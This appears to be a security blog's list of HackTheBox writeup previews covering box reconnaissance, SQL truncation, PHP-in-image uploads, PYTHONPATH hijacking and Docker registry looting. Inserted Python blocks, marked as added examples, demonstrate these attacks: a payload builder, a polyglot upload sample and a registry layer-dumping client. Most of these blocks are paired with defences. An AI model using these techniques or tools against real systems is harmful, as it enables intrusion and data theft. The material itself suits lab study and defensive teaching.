Posts
Vibhu025

Hackthebox Admirer Writeup

Information:~$

    Title       Details
    Name        Admirer
    IP          10.10.10.187
    Difficulty  Easy
    Points      20
    OS          Linux

Brief:~$

Admirer is an easy-rated Linux box. It was indeed easy, but there were a lot of fake credentials along the way. Starting with an nmap scan, we find a robots.txt disallowing /admin-dir. Fuzzing admin-dir turns up two files, one of which contains FTP credentials. Logging in to FTP gives us some files that reference a utility-scripts directory, and fuzzing that directory reveals adminer.php. By pointing Adminer at a MySQL server hosted on our own machine we obtain the password of the waldo user. Waldo can run a script as root, and Python path hijacking against that script gives us a root shell.

Reconnaissance:~$

Nmap Scan:~$

    nmap -sC -sV 10.10.10.187

    # Nmap 7.80 scan initiated Mon May 4 20:11:20 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.187
    Nmap scan report for 10.10.10.187
    Host is up (0.28s latency).
    Not shown: 997 closed ports
    PORT   STATE SERVICE VERSION
    21/tcp open  ftp     vsftpd 3.0.3
    22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
    | ssh-hostkey:
    |   2048 4a:71:e9:21:63:69:9d:cb:dd:84:02:1a:23:97:e1:b9 (RSA)
    |   256 c5:95:b6:21:4d:46:a4:25:55:7a:87:3e:19:a8:e7:02 (ECDSA)
    |_  256 d0:2d:dd:d0:5c:42:f8:7b:31:5a:be:57:c4:a9:a7:56 (ED25519)
    80/tcp open  http    Apache httpd 2.4.25 ((Debian))
    | http-robots.txt: 1 disallowed entry
    |_/admin-dir
    |_http-server-header: Apache/2.4.25 (Debian)
    |_http-title: Admirer
    Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Mon May 4 20:12:30 2020 -- 1 IP address (1 host up) scanned in 70.66 seconds

We get three open ports: 21 (FTP), 22 (SSH) and 80 (HTTP).

Port 21 doesn't allow anonymous login ...
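The Python path hijacking mentioned in the brief is worth seeing end to end, because the whole trick is that `import` resolves names through a search path the caller can influence. The following is an added example, not code from the writeup or from the box: it assumes only that the privileged script is started with an environment whose PYTHONPATH the low-privileged caller controls (how the sudo rule on Admirer permitted that is not shown on this page). The victim script, the malicious module and the choice of `shutil` as the shadowed name are all constructed here; everything runs as the current user inside temporary directories.

```python
"""PYTHONPATH hijacking demonstrated in throwaway directories.

Added example, not code from the Admirer writeup. Assumption: the victim is
started with a PYTHONPATH chosen by the attacker. Both files are constructed.
"""
import os
import subprocess
import sys
import tempfile
import textwrap

# Stand-in for the script run as root: it trusts `import shutil` blindly.
VICTIM_SCRIPT = textwrap.dedent("""\
    import shutil
    print("MODULE", shutil.__file__)
""")

# Attacker-controlled shutil.py. Import-time code runs before the victim does
# anything else, so on a real target this is where the payload would go
# (a shell, a sudoers line, a copied SSH key). Here it only prints the uid.
EVIL_MODULE = textwrap.dedent("""\
    import os
    print("PAYLOAD uid=%d" % os.getuid())
""")


def run_victim(poison, isolate=False):
    """Run the victim with or without an attacker-controlled PYTHONPATH.

    Returns (payload_ran, hijacked): payload_ran is True if the malicious
    module executed; hijacked is True if the victim's `shutil` resolved to
    the attacker's file instead of the standard library. isolate=True runs
    the interpreter with -I, which ignores PYTHON* variables and is the
    interpreter-side mitigation.
    """
    with tempfile.TemporaryDirectory() as victim_dir, \
            tempfile.TemporaryDirectory() as attacker_dir:
        victim = os.path.join(victim_dir, "victim.py")
        with open(victim, "w") as fh:
            fh.write(VICTIM_SCRIPT)
        with open(os.path.join(attacker_dir, "shutil.py"), "w") as fh:
            fh.write(EVIL_MODULE)

        # Start from an environment without PYTHONPATH so an inherited value
        # cannot skew the clean run.
        env = {k: v for k, v in os.environ.items() if k != "PYTHONPATH"}
        if poison:
            env["PYTHONPATH"] = attacker_dir

        cmd = [sys.executable] + (["-I"] if isolate else []) + [victim]
        proc = subprocess.run(cmd, env=env, capture_output=True,
                              text=True, check=True)
        module_lines = [l for l in proc.stdout.splitlines()
                        if l.startswith("MODULE ")]
        module_path = module_lines[0].split(" ", 1)[1] if module_lines else ""
        return ("PAYLOAD" in proc.stdout,
                module_path.startswith(attacker_dir))


if __name__ == "__main__":
    print("clean run      :", run_victim(False))
    print("poisoned run   :", run_victim(True))
    print("poisoned, -I   :", run_victim(True, isolate=True))
```

The defensive side has two layers. On the sudo side, the default `env_reset` drops PYTHONPATH and its siblings before the command runs, so the variable only survives when a rule grants `SETENV` or the caller is otherwise allowed to preserve the environment; auditing sudoers for `SETENV` on rules that run interpreters is the first check. On the script side, starting the interpreter with `-I` (or `-E`) as shown in the isolated run makes it ignore the variable entirely, and a script run as root should also not live in, or import from, any directory writable by the invoking user, since that directory is prepended to `sys.path` regardless of PYTHONPATH.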

Hackthebox Book Writeup

Information:~$

    Title       Details
    Name        Book
    IP          10.10.10.176
    Difficulty  Medium
    Points      30
    OS          Linux

Brief:~$

Book is a medium-rated Linux box. We get the initial foothold by performing an SQL truncation attack to obtain admin access, then a server-side XSS to read a private SSH key. Root was a bit more complicated than user: we need to identify the logrotate process and then exploit it using Logrotten to gain root access.

Reconnaissance:~$

Nmap Scan:~$

    nmap -sC -sV 10.10.10.176

    # Nmap 7.80 scan initiated Fri May 8 14:17:54 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.176
    Nmap scan report for book.htb (10.10.10.176)
    Host is up (0.23s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 f7:fc:57:99:f6:82:e0:03:d6:03:bc:09:43:01:55:b7 (RSA)
    |   256 a3:e5:d1:74:c4:8a:e8:c8:52:c7:17:83:4a:54:31:bd (ECDSA)
    |_  256 e3:62:68:72:e2:c0:ae:46:67:3d:cb:46:bf:69:b9:6a (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    | http-cookie-flags:
    |   /:
    |     PHPSESSID:
    |_      httponly flag not set
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: LIBRARY - Read | Learn | Have Fun
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Fri May 8 14:18:47 2020 -- 1 IP address (1 host up) scanned in 53.84 seconds

Let's start with port 80. We get a login form and a registration form. Do a normal registration and log in.

A few interesting things I found:

The Contact Us page indicates that there is an administrator account, admin@book.htb.
The View Profile page indicates that the current account's permissions are User.
The Collec...
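The SQL truncation attack in the brief works because the application's "is this email already registered?" check and its INSERT disagree about what the email is. The model below is an added example, not code from the writeup: it simulates in pure Python the two MySQL behaviours the attack depends on, and both are assumptions about the target's configuration, which the page does not show. First, without STRICT mode an INSERT into a VARCHAR(n) column silently truncates longer values. Second, under the default PAD SPACE collations trailing spaces are not significant in comparisons, so 'admin@book.htb' equals 'admin@book.htb      '. The admin address comes from the text; the column width of 20 is assumed.

```python
"""SQL truncation attack, modelled in pure Python.

Added example, not code from the Book writeup. Assumptions: a VARCHAR(20)
email column, a non-strict sql_mode, and PAD SPACE comparison semantics.
"""

EMAIL_MAXLEN = 20          # assumed VARCHAR(20)


def mysql_eq(a, b):
    """MySQL-style equality: trailing spaces are not significant."""
    return a.rstrip(" ") == b.rstrip(" ")


class UsersTable:
    """Minimal stand-in for a `users` table; strict=True models STRICT mode."""

    def __init__(self, strict=False):
        self.rows = []        # (email, password) tuples
        self.strict = strict

    def select(self, email):
        return [r for r in self.rows if mysql_eq(r[0], email)]

    def insert(self, email, password):
        if len(email) > EMAIL_MAXLEN:
            if self.strict:
                raise ValueError("Data too long for column 'email'")
            email = email[:EMAIL_MAXLEN]      # silent truncation, warning only
        self.rows.append((email, password))


def register(table, email, password):
    """Vulnerable flow: the duplicate check sees the full input while the
    INSERT stores the truncated one, so the two disagree about the value."""
    if table.select(email):
        return False                          # "email already registered"
    table.insert(email, password)
    return True


def login(table, email, password):
    return any(p == password for _, p in table.select(email))


def truncation_payload(victim_email):
    """Pad to the column width, then add one extra character: the duplicate
    check no longer matches the victim, but truncation drops that character
    and the stored row collides with the victim's under PAD SPACE rules."""
    return victim_email.ljust(EMAIL_MAXLEN) + "x"


def register_hardened(table, email, password):
    """Normalise once and validate against the column width before both the
    check and the INSERT; an email containing a space is rejected outright."""
    email = email.strip()
    if len(email) > EMAIL_MAXLEN or " " in email:
        return False
    return register(table, email, password)


def demo(victim="admin@book.htb", new_password="attacker-chosen"):
    """Outcome of the attack under three configurations."""
    out = {}
    # 1) non-strict table, vulnerable registration: second row collides
    t = UsersTable()
    register(t, victim, "original-secret")
    out["before"] = login(t, victim, new_password)
    out["accepted"] = register(t, truncation_payload(victim), new_password)
    out["after"] = login(t, victim, new_password)
    # 2) same application code, STRICT sql_mode: INSERT errors instead
    s = UsersTable(strict=True)
    register(s, victim, "original-secret")
    try:
        register(s, truncation_payload(victim), new_password)
        out["strict_blocked"] = False
    except ValueError:
        out["strict_blocked"] = True
    # 3) non-strict table, hardened registration: rejected before INSERT
    h = UsersTable()
    register(h, victim, "original-secret")
    out["hardened_accepted"] = register_hardened(
        h, truncation_payload(victim), new_password)
    out["hardened_after"] = login(h, victim, new_password)
    return out


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key:18} {value}")
```

Either fix on its own closes the hole: enabling STRICT_TRANS_TABLES turns the truncation into an error the application has to handle, and validating the length before the existence check means the check and the INSERT always operate on the same value. A UNIQUE constraint on the email column is the third layer, since the truncated duplicate would then fail at INSERT time even in non-strict mode.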

Hackthebox Obscurity Writeup

Information:~$

    Title       Details
    Name        Obscurity
    IP          10.10.10.168
    Difficulty  Medium
    Points      30
    OS          Linux

Brief:~$

Reconnaissance:~$

We will start with a basic nmap scan.

Nmap:~$

    nmap -sC -sV 10.10.10.168

    # Nmap 7.80 scan initiated Wed Feb 26 23:04:36 2020 as: nmap -sC -sV -oA nmap/initial 10.10.10.168
    Nmap scan report for 10.10.10.168
    Host is up (0.33s latency).
    Not shown: 996 filtered ports
    PORT     STATE  SERVICE    VERSION
    22/tcp   open   ssh        OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 33:d3:9a:0d:97:2c:54:20:e1:b0:17:34:f4:ca:70:1b (RSA)
    |   256 f6:8b:d5:73:97:be:52:cb:12:ea:8b:02:7c:34:a3:d7 (ECDSA)
    |_  256 e8:df:55:78:76:85:4b:7b:dc:70:6a:fc:40:cc:ac:9b (ED25519)
    80/tcp   closed http
    8080/tcp open   http-proxy BadHTTPServer
    |_http-server-header: BadHTTPServer
    |_http-title: 0bscura
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Wed Feb 26 23:05:48 2020 -- 1 IP address (1 host up) scanned in 71.69 seconds

Let's start with port 8080. The page hints at a source-code leak:

    Message to server devs: the current source code for the web server is in 'SuperSecureServer.py' in the secret development directory

So we fuzz for the directory that holds that file:

    ffuf -c -w /usr/share/wordlists/dirb/common.txt -u http://10.10.10.168:8080/FUZZ/SuperSecureServer.py
    ...

Hackthebox Magic Writeup

Information:~$

    Title       Details
    Name        Magic
    IP          10.10.10.185
    Difficulty  Medium
    Points      30
    OS          Linux

Brief:~$

Magic is a medium-rated Linux box that lets us revisit basic concepts such as SQL injection and file upload vulnerabilities. After bypassing the login and uploading a reverse shell embedded in an image, we get a reverse shell. From there we find the MySQL credentials, and dumping the database gives us theseus's password. Then we find an SUID binary, and exploiting it by manipulating the PATH variable gives us root.

Reconnaissance:~$

As usual, an nmap scan.

Nmap:~$

    nmap -sC -sV 10.10.10.185

Nothing exciting, just two ports:

    # Nmap 7.80 scan initiated Wed Apr 29 16:12:56 2020 as: nmap -sC -sV -v -oN nmap/initial 10.10.10.185
    Nmap scan report for 10.10.10.185
    Host is up (0.22s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 06:d4:89:bf:51:f7:fc:0c:f9:08:5e:97:63:64:8d:ca (RSA)
    |   256 11:a6:92:98:ce:35:40:c7:29:09:4f:6c:2d:74:aa:66 (ECDSA)
    |_  256 71:05:99:1f:a8:1b:14:d6:03:85:53:f8:78:8e:cb:88 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    | http-methods:
    |_  Supported Methods: GET HEAD POST OPTIONS
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Magic Portfolio
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Read data files from: /usr/bin/../share/nmap
    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Wed Apr 29 16:14:10 2020 -- 1 IP address (1 host up) scanned in 74.76 seconds

We get two open ports: 22 (SSH) and 80 (HTTP). Let's take a look at port 80. Nothing exciting except a link to a login page, so let's visit the login page.

Initial Footh...
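The "reverse shell embedded in an image" step in the brief succeeds against upload filters that look at the extension and at the first few bytes, because a file can satisfy both and still carry PHP further in. The following is an added example, not code from the writeup or from the box: the weak filter it models (last extension on an allow-list plus an image-signature check on the leading bytes) is an assumption about how such filters are commonly written, since the page only says the shell was embedded in an image. The sample files are constructed inline and are not the payload used on the box. The hardened check beside it is what I would ship instead.

```python
"""Image upload filter: the weak check a PHP-in-image upload passes, next to
a hardened one.

Added example, not code from the Magic writeup. The filter shape is an
assumption; CLEAN_GIF and POLYGLOT are constructed samples.
"""
import re
import secrets

# extension -> image type the content must actually be
ALLOWED_EXT = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}
IMAGE_MAGIC = {
    b"\xff\xd8\xff": "jpeg",
    b"\x89PNG\r\n\x1a\n": "png",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
PHP_TAG = re.compile(rb"<\?(?:php\b|=)", re.IGNORECASE)

# Constructed samples: a 1x1 GIF stub, and the same header followed by a PHP
# stub. Both start like an image, so byte-sniffing alone cannot tell them apart.
CLEAN_GIF = b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff;"
POLYGLOT = b"GIF89a" + b"<?php echo 'pwned'; ?>"


def sniff_image(data):
    """Image type implied by the leading bytes, or None."""
    for magic, kind in IMAGE_MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def naive_check(filename, data):
    """Weak filter: last extension allowed AND the file looks like an image
    up front. 'shell.php.gif' with a GIF header passes; whether the server
    then executes it depends on how it maps extensions to the PHP handler."""
    ext = filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXT and sniff_image(data) is not None


def hardened_check(filename, data):
    """Return (ok, reason). Rejects multiple extensions, extension/content
    mismatch and any PHP open tag anywhere in the body."""
    parts = filename.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        return False, "exactly one extension required"
    ext = parts[1]
    if ext not in ALLOWED_EXT:
        return False, "extension not allowed"
    if sniff_image(data) != ALLOWED_EXT[ext]:
        return False, "content does not match extension"
    if PHP_TAG.search(data):
        return False, "PHP open tag inside image data"
    return True, "ok"


def stored_name(ext):
    """Never keep the client's filename: choose a random one server-side."""
    return secrets.token_hex(16) + "." + ext


if __name__ == "__main__":
    print("naive    shell.php.gif:", naive_check("shell.php.gif", POLYGLOT))
    print("hardened shell.php.gif:", hardened_check("shell.php.gif", POLYGLOT))
    print("hardened shell.gif    :", hardened_check("shell.gif", POLYGLOT))
    print("hardened cat.gif      :", hardened_check("cat.gif", CLEAN_GIF))
```

Scanning for the PHP tag catches the case where the payload sits in an EXIF comment or after the image data, but the stronger control is to re-encode every upload with an image library, which discards metadata and trailing bytes entirely, and to store uploads under a server-generated name outside the web root, served by a handler that never passes them to PHP. The double-extension case matters only because some Apache configurations match `.php` anywhere in the name when choosing a handler; checking that mapping is part of reviewing any PHP upload feature.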

Hackthebox Servmon Writeup

Information:~$

    Title       Details
    Name        Servmon
    IP          10.10.10.184
    Difficulty  Easy
    Points      20
    OS          Windows
    Creator     thek

Brief:~$

Servmon was an easy-rated Windows machine that was a bit of a journey: user was pretty easy, but root was hell for me. Anonymous FTP login allowed us to view an interesting file. The initial foothold was gained by exploiting a directory traversal in the NVMS server to read a sensitive file containing the password of the Nadine user. As a low-privileged user we could read the administrative password of NSClient++, and with a few API requests we obtained an nt authority\system shell.

Reconnaissance:~$

As usual, an nmap scan.

Nmap:~$

    nmap -sC -sV 10.10.10.184

We get a bunch of interesting information:

    # Nmap 7.80 scan initiated Sun Apr 12 20:11:38 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.184
    Nmap scan report for 10.10.10.184
    Host is up (0.20s latency).
    Not shown: 991 closed ports
    PORT     STATE SERVICE       VERSION
    21/tcp   open  ftp           Microsoft ftpd
    | ftp-anon: Anonymous FTP login allowed (FTP code 230)
    |_01-18-20  12:05PM       <DIR>          Users
    | ftp-syst:
    |_  SYST: Windows_NT
    22/tcp   open  ssh           OpenSSH for_Windows_7.7 (protocol 2.0)
    | ssh-hostkey:
    |   2048 b9:89:04:ae:b6:26:07:3f:61:89:75:cf:10:29:28:83 (RSA)
    |   256 71:4e:6c:c0:d3:6e:57:4f:06:b8:95:3d:c7:75:57:53 (ECDSA)
    |_  256 15:38:bd:75:06:71:67:7a:01:17:9c:5c:ed:4c:de:0e (ED25519)
    80/tcp   open  http
    135/tcp  open  msrpc         Microsoft Windows RPC
    139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
    445/tcp  open  microsoft-ds?
    5666/tcp open  tcpwrapped
    6699/tcp open  napster?
    8443/tcp open  ssl/https-alt
    | fingerprint-strings:
    |   FourOhFourRequest, HTTPOptions...

Hackthebox Registry Writeup

Information:~$

    Title       Details
    Name        Registry
    IP          10.10.10.159
    Difficulty  Hard
    Points      40
    OS          Linux
    Creator     thek

Brief:~$

Registry was a hard-rated Linux machine that was a bit of a journey but a lot of fun for me. The initial foothold was gained by taking advantage of a weak password on a Docker registry, which enabled us to download sensitive files, one of which was a private SSH key for the user 'bolt' together with its passphrase. While enumerating the system, a database file for the Bolt CMS was found which contained a hash of a weak password. Cracking the hash gave admin access to the CMS, which let us upload a webshell and pivot to the 'www-data' user. www-data had sudo access to run a Restic backup, so a Restic REST server was deployed on my attacking machine and an SSH tunnel used to make the REST server appear local to Registry. From there, a backup of Registry's /root folder was run and restored to my attacking machine, which included root's private SSH key.

Reconnaissance:~$

We will start with a basic nmap scan.

Nmap:~$

    nmap -sC -sV 10.10.10.159

We get a bunch of interesting information:

    # Nmap 7.80 scan initiated Tue Feb 4 19:18:31 2020 as: nmap -sC -sV -oA nmap/initial 10.10.10.159
    Nmap scan report for 10.10.10.159
    Host is up (0.28s latency).
    Not shown: 997 closed ports
    PORT    STATE SERVICE  VERSION
    22/tcp  open  ssh      OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 72:d4:8d:da:ff:9b:94:2a:ee:55:0c:04:30:71:88:93 (RSA)
    |   256 c7:40:d0:0e:e4:97:4a:4f:f9:fb:b2:0b:33:99:48:6d (ECDSA)
    |_  256 78:34:80:14:a1:3d:56:12:b4:0a:98:1f:e6:b4:e8:93 (ED25519)
    80/tcp  open  http     nginx 1.14.0 (Ubuntu)
    |_http-server-header: nginx/1.14.0 (Ubuntu)
    |_http-title: Welcome to nginx!
    443/tcp open  ssl/http nginx 1.14.0 (Ubuntu)
    |_http-...
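Pulling "sensitive files" out of a Docker registry once you have credentials is a matter of walking the Registry HTTP API v2: list repositories, list a repository's tags, fetch the manifest for a tag, then download each layer blob it references and untar it. The client below is an added example, not code from the writeup or from the box; the registry URL, credentials and the `insecure` flag are placeholders (assumptions), since the page says only that a weak registry password allowed downloading files. SAMPLE_MANIFEST is constructed so the digest handling can be exercised offline.

```python
"""Docker Registry HTTP API v2 client: enumerate, fetch a manifest, download
and verify its layers.

Added example, not code from the Registry writeup. Host, repository and
credentials are placeholders; SAMPLE_MANIFEST is constructed.
"""
import base64
import hashlib
import json
import os
import ssl
import urllib.request

MANIFEST_V2 = "application/vnd.docker.distribution.manifest.v2+json"


def _get(base_url, path, user, password, accept=None, insecure=False):
    """Authenticated GET against the registry; returns the raw body."""
    req = urllib.request.Request(base_url.rstrip("/") + path)
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    req.add_header("Authorization", "Basic " + token)
    if accept:
        req.add_header("Accept", accept)
    # Lab registries often use self-signed certificates; only disable
    # verification deliberately, never by default.
    ctx = ssl._create_unverified_context() if insecure else None
    with urllib.request.urlopen(req, timeout=15, context=ctx) as resp:
        return resp.read()


def list_repositories(base_url, user, password, insecure=False):
    body = _get(base_url, "/v2/_catalog", user, password, insecure=insecure)
    return json.loads(body)["repositories"]


def list_tags(base_url, repo, user, password, insecure=False):
    body = _get(base_url, f"/v2/{repo}/tags/list", user, password,
                insecure=insecure)
    return json.loads(body)["tags"]


def get_manifest(base_url, repo, tag, user, password, insecure=False):
    body = _get(base_url, f"/v2/{repo}/manifests/{tag}", user, password,
                accept=MANIFEST_V2, insecure=insecure)
    return json.loads(body)


def layer_digests(manifest):
    """Layer digests bottom layer first. Handles schema 2 ('layers') and
    schema 1 ('fsLayers', which lists the top layer first)."""
    if manifest.get("schemaVersion") == 2:
        return [layer["digest"] for layer in manifest.get("layers", [])]
    return [layer["blobSum"] for layer in reversed(manifest.get("fsLayers", []))]


def verify_blob(digest, data):
    """Digests are '<algorithm>:<hex>'; recompute over the body and compare."""
    algo, _, expected = digest.partition(":")
    return hashlib.new(algo, data).hexdigest() == expected


def pull_layers(base_url, repo, tag, user, password, outdir, insecure=False):
    """Download every layer of repo:tag into outdir, verifying each digest.
    Returns the written paths. Layers are gzipped tarballs: extract them in
    order with `tar xzf` and search the tree for keys, configs and passwords."""
    manifest = get_manifest(base_url, repo, tag, user, password, insecure)
    os.makedirs(outdir, exist_ok=True)
    paths = []
    for digest in layer_digests(manifest):
        blob = _get(base_url, f"/v2/{repo}/blobs/{digest}", user, password,
                    insecure=insecure)
        if not verify_blob(digest, blob):
            raise ValueError(f"digest mismatch for {digest}")
        path = os.path.join(outdir, digest.replace(":", "_") + ".tar.gz")
        with open(path, "wb") as fh:
            fh.write(blob)
        paths.append(path)
    return paths


# Constructed schema-2 manifest for offline use; the digests are the real
# SHA-256 values of the short byte strings b"layer-0" and b"layer-1".
SAMPLE_MANIFEST = {
    "schemaVersion": 2,
    "mediaType": MANIFEST_V2,
    "layers": [
        {"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "digest": "sha256:" + hashlib.sha256(b"layer-0").hexdigest()},
        {"mediaType": "application/vnd.docker.image.rootfs.diff.tar.gzip",
         "digest": "sha256:" + hashlib.sha256(b"layer-1").hexdigest()},
    ],
}


if __name__ == "__main__":
    # Placeholder target; replace with the registry under test.
    base, user, password = "https://registry.example:443", "admin", "admin"
    for repo in list_repositories(base, user, password, insecure=True):
        for tag in list_tags(base, repo, user, password, insecure=True):
            print(repo, tag, pull_layers(base, repo, tag, user, password,
                                         f"out/{repo}_{tag}", insecure=True))
```

Requesting the schema-2 manifest via the Accept header matters: without it many registries return the older schema-1 document, whose layer list is keyed differently and ordered top-first, which is why `layer_digests` handles both. Verifying each blob against its digest is cheap and catches truncated downloads before you spend time grepping a corrupt tarball.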

Hackthebox Traceback Writeup

Information:~$

    Title       Details
    Name        Traceback
    IP          10.10.10.181
    Difficulty  Easy
    Points      20
    OS          Linux
    Creator     Xh4H

Brief:~$

Traceback is an easy-rated Linux box. The initial foothold can be gained through a webshell already left on port 80. Privilege escalation to sysadmin works by abusing the Lua interpreter, and for root we can edit the scripts in update-motd.d, which are run when a user logs in through SSH.

Reconnaissance:~$

Nmap Scan:~$

    nmap -sC -sV -oN nmap/initial 10.10.10.181

    # Nmap 7.80 scan initiated Sun Mar 15 20:18:30 2020 as: nmap -sC -sV -oN nmap/initial 10.10.10.181
    Nmap scan report for 10.10.10.181
    Host is up (0.46s latency).
    Not shown: 997 closed ports
    PORT     STATE    SERVICE VERSION
    22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey:
    |   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
    |   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
    |_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
    80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Help us
    3000/tcp filtered ppp
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    # Nmap done at Sun Mar 15 20:20:03 2020 -- 1 IP address (1 host up) scanned in 93.34 seconds

We get two open ports. Let's visit port 80. Looking at the source of the page we land on, I found:

    <body>
    <center>
    <h1>This site has been owned</h1>
    <h2>I have left a backdoor for all the net. FREE INTERNETZZZ</h2>
    <h3> - Xh4H - </h3>
    <!--Some of the best web shells that you might need ;)-->
    </center>
    </body>

S...